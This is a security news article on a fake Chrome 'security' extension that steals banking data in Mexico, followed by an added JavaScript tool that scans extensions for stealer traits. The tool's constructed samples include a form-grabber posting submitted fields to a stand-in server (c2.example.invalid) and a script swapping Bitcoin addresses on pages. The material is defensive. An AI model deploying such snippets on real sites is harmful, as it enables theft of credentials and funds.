
ESET Latin America has detected a malicious Chrome extension that poses as a security tool. It steals banking data and can swap the victim's bank account and virtual wallet details for ones controlled by the cybercriminals, enabling the misappropriation of funds.
ESET, a leading company in proactive threat detection, reports that its Latin America Research Lab has identified malicious code that targets Windows systems and masquerades as a security extension for Google Chrome. Detected by ESET solutions as JS/Spy.Banker.CV, it is an infostealer that harvests sensitive information.

The malware spreads in the region, primarily in Mexico, through compressed attachments in emails that appear to come from well-known financial institutions. Its code contains words, variable names, and replacement strings in Portuguese, showing that this type of threat crosses borders.
The threat detects when the user is on a financial page by looking for patterns common to such sites. When it finds them, it modifies the DOM (Document Object Model), changing how the page looks and behaves without the user noticing, and presents fake forms that look like the real ones. Everything entered into these forms is redirected to a server controlled by the cybercriminals.
It can also replace the user's cryptocurrency wallet and bank account details with the attackers' own, diverting funds to them.

“We are dealing with an infostealer capable of stealing sensitive information from a victim when they fill out a form on a website. With the ability to modify the victim’s wallet and other payment information, it clearly demonstrates that cybercriminals are seeking financial gain. This threat transcends borders and exploits the reputation of financial institutions throughout the region,” says Mario Micucci, IT Security Researcher at ESET Latin America.
During analysis, the ESET team observed that the sample spreads in Mexico via compressed email attachments. Within the malicious extension they found two JavaScript files capable of stealing sensitive data, visually manipulating websites, and exfiltrating information to command-and-control (C2) servers.

Analysis of the files identified visual manipulation of banking sites. The code looks for patterns common to bank or payment pages, such as “CPF” and “CNPJ” (Brazilian taxpayer identifiers) and “value”, and when it finds them it modifies the DOM to deceive the user, including replacing genuine data with attacker-controlled data. Concretely, it scans the text of the page’s <body> for terms related to bank deposits; if it finds “deposit”, “CPF” or “CNPJ”, and “value” together, it injects its malicious logic.

“During the analysis, we noticed that the malicious Google Chrome internet extension persists on the victim machine. The samples containing the extension operate synchronously. While one collects sensitive data, the other manipulates the user’s visual environment to mislead or divert transfers. All interactions are channeled to common malicious domains. It is important to mention that this persistence applies to the affected browser; specifically, the malware will execute every time the victim uses it,” explains Micucci of ESET Latin America.

The malware’s advanced visual manipulation, aimed mainly at users of financial services, together with its modular architecture and evasion techniques, calls for specific detection measures. ESET reminds users that it is very important to review the extensions installed on their systems and to confirm that the source is trustworthy before installing any application.
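The extension-review advice above, and the traits ESET describes for the two content scripts (banking-term matching on page text, DOM rewriting, wallet replacement, exfiltration to C2), turned into a static triage script. This is an added example written for this page, not ESET's tooling and not code from the malware; the indicator lists, scoring thresholds, sample manifests and scripts, and the domain c2.example.invalid are all constructed for the demonstration.

```javascript
// Added example for this page (not ESET's tooling and not code from the
// malware): a static triage pass over an unpacked Chrome extension that looks
// for the traits described in the article: content scripts injected on every
// site, banking-term matching on page text, DOM rewriting, hardcoded wallet
// addresses, and exfiltration to a hardcoded server. Indicator lists, scoring
// thresholds, sample manifests/scripts and the domain c2.example.invalid are
// all constructed for the demonstration.

const BANKING_TERMS = ['cpf', 'cnpj', 'deposit', 'valor', 'pix', 'wallet', 'carteira'];
const DOM_WRITE_RE = /\b(innerHTML|outerHTML|insertAdjacentHTML|replaceChild|document\.write)\b/;
const EXFIL_RE = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b/;
const URL_RE = /https?:\/\/[a-z0-9.-]+(?::\d+)?(?:\/[^\s'"`]*)?/gi;
// Bitcoin bech32 / base58 and Ethereum address shapes (assumed formats, adequate for triage)
const WALLET_RE = /\b(bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34}|0x[a-fA-F0-9]{40})\b/;
const RISKY_PERMS = ['webRequest', 'cookies', 'scripting', 'tabs', 'clipboardWrite'];

// True for match patterns that cover every site
function isBroadMatch(pattern) {
  return pattern === '<all_urls>' || /^\*:\/\/\*\//.test(pattern) || /^https?:\/\/\*\//.test(pattern);
}

// manifest: parsed manifest.json; scripts: { filename: sourceText }.
// Returns { score, verdict, findings }, each finding carrying a severity 1-3.
function analyzeExtension(manifest, scripts) {
  const findings = [];
  const note = (sev, file, what) => findings.push({ sev, file, what });

  for (const cs of manifest.content_scripts || []) {
    const broad = (cs.matches || []).filter(isBroadMatch);
    if (broad.length) note(2, 'manifest.json', `content scripts ${cs.js.join(', ')} injected on ${broad.join(', ')}`);
  }
  const hosts = manifest.host_permissions || [];
  if (hosts.some(isBroadMatch)) note(2, 'manifest.json', `host_permissions grants ${hosts.join(', ')}`);
  const risky = (manifest.permissions || []).filter((p) => RISKY_PERMS.includes(p));
  if (risky.length) note(1, 'manifest.json', `sensitive permissions: ${risky.join(', ')}`);

  for (const [file, src] of Object.entries(scripts)) {
    // Strip accents so Portuguese "depósito" still hits the "deposit" indicator
    const folded = src.normalize('NFD').replace(/[\u0300-\u036f]/g, '').toLowerCase();
    const terms = BANKING_TERMS.filter((t) => folded.includes(t));
    const writesDom = DOM_WRITE_RE.test(src);
    const urls = [...new Set(src.match(URL_RE) || [])];
    const wallet = src.match(WALLET_RE);

    if (terms.length >= 2 && writesDom) note(3, file, `matches banking terms (${terms.join(', ')}) and rewrites the DOM`);
    else if (terms.length >= 2) note(1, file, `matches banking terms (${terms.join(', ')})`);
    else if (writesDom) note(1, file, 'rewrites the DOM');
    if (wallet) note(3, file, `hardcoded wallet address ${wallet[0]}`);
    if (EXFIL_RE.test(src) && urls.length) note(3, file, `sends data to hardcoded server(s): ${urls.join(', ')}`);
  }

  const score = findings.reduce((sum, f) => sum + f.sev, 0);
  const verdict = score >= 8 ? 'likely malicious' : score >= 4 ? 'suspicious' : 'low risk';
  return { score, verdict, findings };
}

// Constructed sample: a fake "security" extension showing the traits from the article
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Secure Banking Guard',
  permissions: ['storage', 'webRequest', 'cookies'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js', 'collect.js'], run_at: 'document_end' }],
};
const SAMPLE_SCRIPTS = {
  'inject.js': `
    const text = document.body.innerText.toLowerCase();
    if (text.includes('depósito') && (text.includes('cpf') || text.includes('cnpj')) && text.includes('valor')) {
      document.body.innerHTML = document.body.innerHTML.replace(/bc1[a-z0-9]{25,59}/g, 'bc1qexampleattackeraddressxxxxxxxxxxxxxxxx');
    }`,
  'collect.js': `
    document.addEventListener('submit', (e) => {
      const fields = Object.fromEntries(new FormData(e.target));
      fetch('https://c2.example.invalid/collect', { method: 'POST', body: JSON.stringify(fields) });
    });`,
  'popup.js': `document.getElementById('status').textContent = 'Protection active';`,
};

// Constructed benign extension for contrast
const BENIGN_MANIFEST = { manifest_version: 3, name: 'Notes', permissions: ['storage'], content_scripts: [{ matches: ['https://notes.example/*'], js: ['notes.js'] }] };
const BENIGN_SCRIPTS = { 'notes.js': `document.getElementById('out').textContent = localStorage.getItem('note') || '';` };

function printReport(label, { score, verdict, findings }) {
  console.log(`${label}: ${verdict} (score ${score})`);
  for (const f of findings) console.log(`  [${f.sev}] ${f.file}: ${f.what}`);
}

printReport('Secure Banking Guard', analyzeExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS));
printReport('Notes', analyzeExtension(BENIGN_MANIFEST, BENIGN_SCRIPTS));
```

Run it with node; to triage a real unpacked extension, read manifest.json and the files named in its content_scripts and background entries from the extension's directory (Chrome keeps installed extensions under the profile's Extensions folder) and pass them in place of the constructed samples. The indicators are deliberately coarse: a script that both matches banking terms and rewrites the DOM, or ships a wallet address literal, is the combination the article describes, and that is what earns the highest severity here; isolated hits only raise the score a little.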